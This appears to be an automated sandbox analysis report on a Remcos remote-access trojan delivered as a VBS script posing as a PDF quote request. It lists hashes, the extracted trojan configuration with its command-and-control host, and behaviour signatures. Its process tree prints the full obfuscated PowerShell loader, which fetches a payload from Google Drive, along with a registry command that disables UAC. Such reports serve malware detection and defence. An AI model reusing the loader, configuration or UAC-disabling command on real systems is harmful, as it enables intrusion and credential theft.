Analysis
max time kernel: 299s
max time network: 280s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 18-11-2024 10:03
Static task: static1
Behavioral task: behavioral1 (Sample: Fluor RFQ1475·pdf.vbs; Resource: win7-20240903-en)
Behavioral task: behavioral2 (Sample: Fluor RFQ1475·pdf.vbs; Resource: win10v2004-20241007-en)
General
Target: Fluor RFQ1475·pdf.vbs
Size: 15KB
MD5: 695ec6cd0d4d8abaab5bed4e4f37153d
SHA1: 027b2b36b69e9f41bc5b54493533d8b417192255
SHA256: 3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060
SHA512: 36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c
SSDEEP: 384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8
Malware Config
Extracted: remcos
RemoteHost: mtt9kw1mj.duckdns.org:23458
audio_folder: MicRecords
audio_path: ApplicationPath
audio_record_time: 5
connect_delay: 0
connect_interval: 1
copy_file: remcos.exe
copy_folder: Remcos
delete_file: false
hide_file: false
hide_keylog_file: true
install_flag: false
keylog_crypt: true
keylog_file: logs.dat
keylog_flag: false
keylog_folder: remcos
mouse_option: false
mutex: Rmc-28YJO8
screenshot_crypt: false
screenshot_flag: false
screenshot_folder: Screenshots
screenshot_path: %AppData%
screenshot_time: 10
take_screenshot_option: false
take_screenshot_time: 5
Signatures
Remcos family
UAC bypass
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (reg.exe)
Detected Nirsoft tools (3 IoCs)
Free utilities often used by attackers which can steal passwords, product keys, etc.
- behavioral2/memory/1708-93-0x0000000000400000-0x0000000000424000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/1096-87-0x0000000000400000-0x0000000000462000-memory.dmp (yara rule: Nirsoft)
- behavioral2/memory/4776-86-0x0000000000400000-0x0000000000478000-memory.dmp (yara rule: Nirsoft)
NirSoft MailPassView (1 IoCs)
Password recovery tool for various email clients
- behavioral2/memory/1096-87-0x0000000000400000-0x0000000000462000-memory.dmp (yara rule: MailPassView)
NirSoft WebBrowserPassView (1 IoCs)
Password recovery tool for various web browsers
- behavioral2/memory/4776-86-0x0000000000400000-0x0000000000478000-memory.dmp (yara rule: WebBrowserPassView)
Blocklisted process makes network request (13 IoCs)
- flow 4: PID 2752 WScript.exe
- flow 9: PID 3944 powershell.exe
- flow 11: PID 3944 powershell.exe
- flows 39, 41, 43, 45, 46, 49, 50, 51, 53, 54: PID 1824 msiexec.exe
Uses browser remote debugging (2 TTPs, 9 IoCs)
Can be used to control the browser and steal sensitive information such as credentials and session cookies.
- PID 1016 Chrome.exe
- PID 584 msedge.exe
- PID 3296 msedge.exe
- PID 3832 msedge.exe
- PID 3776 Chrome.exe
- PID 2176 Chrome.exe
- PID 4416 Chrome.exe
- PID 912 msedge.exe
- PID 4472 msedge.exe
Checks computer location settings (2 TTPs, 1 IoCs)
Looks up country code configured in the registry, likely geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation (WScript.exe)
Accesses Microsoft Outlook accounts (1 TTPs, 1 IoCs)
- Key opened: \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts (msiexec.exe)
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 3 IoCs)
- flow 8: drive.google.com
- flow 9: drive.google.com
- flow 39: drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
- PID 1824 msiexec.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
- PID 3476 powershell.exe
- PID 1824 msiexec.exe
Suspicious use of SetThreadContext (3 IoCs)
- PID 1824 msiexec.exe set thread context of PID 4776 (procid_target 116)
- PID 1824 msiexec.exe set thread context of PID 1096 (procid_target 117)
- PID 1824 msiexec.exe set thread context of PID 1708 (procid_target 118)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTPs, 7 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe, 4 entries)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (reg.exe)
Enumerates system info in registry (2 TTPs, 6 IoCs)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (msedge.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (Chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName (Chrome.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (Chrome.exe)
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS (msedge.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (msedge.exe)
Modifies registry class (1 IoCs)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ (msedge.exe)
Modifies registry key (1 TTPs, 1 IoCs)
- PID 3016 reg.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
- PID 3944 powershell.exe (2 entries)
- PID 3476 powershell.exe (3 entries)
- PID 1824 msiexec.exe (51 entries)
- PID 4776 msiexec.exe (4 entries)
- PID 1708 msiexec.exe (2 entries)
- PID 3776 Chrome.exe (2 entries)
Suspicious behavior: MapViewOfSection (4 IoCs)
- PID 3476 powershell.exe
- PID 1824 msiexec.exe (3 entries)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (4 IoCs)
- PID 584 msedge.exe (4 entries)
Suspicious use of AdjustPrivilegeToken (19 IoCs)
- Token: SeDebugPrivilege, PID 3944 powershell.exe
- Token: SeDebugPrivilege, PID 3476 powershell.exe
- Token: SeDebugPrivilege, PID 1708 msiexec.exe
- Token: SeShutdownPrivilege, PID 3776 Chrome.exe (8 entries)
- Token: SeCreatePagefilePrivilege, PID 3776 Chrome.exe (8 entries)
Suspicious use of FindShellTrayWindow (3 IoCs)
- PID 3776 Chrome.exe
- PID 584 msedge.exe (2 entries)
Suspicious use of SetWindowsHookEx (1 IoCs)
- PID 1824 msiexec.exe
Suspicious use of WriteProcessMemory (64 IoCs)
- PID 2752 WScript.exe wrote to memory of PID 3944 (procid_target 83; 2 entries)
- PID 3476 powershell.exe wrote to memory of PID 1824 (procid_target 106; 4 entries)
- PID 1824 msiexec.exe wrote to memory of PID 3896 (procid_target 111; 3 entries)
- PID 3896 cmd.exe wrote to memory of PID 3016 (procid_target 113; 3 entries)
- PID 1824 msiexec.exe wrote to memory of PID 3776 (procid_target 114; 2 entries)
- PID 3776 Chrome.exe wrote to memory of PID 1064 (procid_target 115; 2 entries)
- PID 1824 msiexec.exe wrote to memory of PID 4776 (procid_target 116; 4 entries)
- PID 1824 msiexec.exe wrote to memory of PID 1096 (procid_target 117; 4 entries)
- PID 1824 msiexec.exe wrote to memory of PID 1708 (procid_target 118; 4 entries)
- PID 3776 Chrome.exe wrote to memory of PID 2992 (procid_target 120; 30 entries)
- PID 3776 Chrome.exe wrote to memory of PID 4384 (procid_target 121; 2 entries)
- PID 3776 Chrome.exe wrote to memory of PID 3620 (procid_target 122; 4 entries)
Processes
Process (depth 1): C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"
  Signatures:
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 2752
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. 
Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep 
CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet 
RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"2⤵
  Signatures:
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID: 3944
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. 
Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep 
CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet 
RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"1⤵
  Signatures:
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 3476
Process (depth 2): C:\Windows\SysWOW64\msiexec.exe
  Command line: "C:\Windows\SysWOW64\msiexec.exe"
  Signatures:
  - Blocklisted process makes network request
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID: 1824
Process (depth 3): C:\Windows\SysWOW64\cmd.exe
  Command line: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  Signatures:
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 3896
Process (depth 4): C:\Windows\SysWOW64\reg.exe
  Command line: C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
  Signatures:
  - UAC bypass
  - System Location Discovery: System Language Discovery
  - Modifies registry key
  PID: 3016
Process (depth 3): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
  Signatures:
  - Uses browser remote debugging
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID: 3776
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff8476ccc40,0x7ff8476ccc4c,0x7ff8476ccc58
  PID: 1064
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2264,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2256 /prefetch:2
  PID: 2992
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1828,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2300 /prefetch:3
  PID: 4384
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1996,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8
  PID: 3620
Process (depth 4): C:\Program Files\Google\Chrome\Application\Chrome.exe
  Command line: "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,14496991912256574668,14449085253052895366,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3188 /prefetch:1
  Signatures:
  - Uses browser remote debugging
